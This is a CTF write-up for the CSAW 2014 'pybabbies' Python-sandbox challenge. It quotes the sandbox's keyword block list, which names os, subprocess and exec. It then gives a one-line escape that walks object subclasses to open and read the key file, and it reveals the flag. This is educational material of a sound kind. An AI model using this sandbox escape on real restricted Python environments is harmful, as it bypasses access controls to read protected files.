pybabbies

CSAW CTF 2014: pybabbies

Category: Exploitation Points: 200 Description:

so secure it hurts

nc 54.165.210.171 12345

Written by ColdHeat

pyshell.py

Write-up

The provided Python script is a Python sandbox that disallows the use of the following commands:

banned = [
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]

One possible solution is the following:

print(().__class__.__bases__[0].__subclasses__()[40]('./key').read())

This prints the contents of the key file:

flag{definitely_not_intro_python}

The flag is definitely_not_intro_python.

Other write-ups and resources

• http://rotlogix.com/2014/09/22/csaw-exploitation-200-pybabies/
• http://evandrix.github.io/ctf/2014-csaw-exploitation-200-pybabbies.html
• https://hexplo.it/escaping-the-csawctf-python-sandbox/
• http://sugarstack.io/csaw2014-pybabbies/
• Escaping Python sandboxes